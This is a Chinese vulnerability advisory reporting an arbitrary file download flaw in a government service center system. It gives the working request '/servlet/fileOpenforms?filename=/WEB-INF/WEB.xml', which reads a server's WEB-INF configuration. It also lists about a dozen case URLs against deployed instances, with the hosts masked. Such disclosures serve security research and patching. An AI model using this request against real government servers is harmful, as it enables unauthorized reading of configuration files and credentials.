某政务服务中心系统通用型任意文件下载

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ### 详细说明: 深圳太极软件有限公司开发系统比较多;这款是政务服务中心系统;存在任意文件下载漏洞;这个系统的案例实在太多,都不需要我多说了~ 任意文件下载: ``` /servlet/fileOpenforms?filename=/WEB-INF/WEB.xml ``` Case: ``` http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8088/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml .....等等 ``` ### 漏洞证明: Security Testing:...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息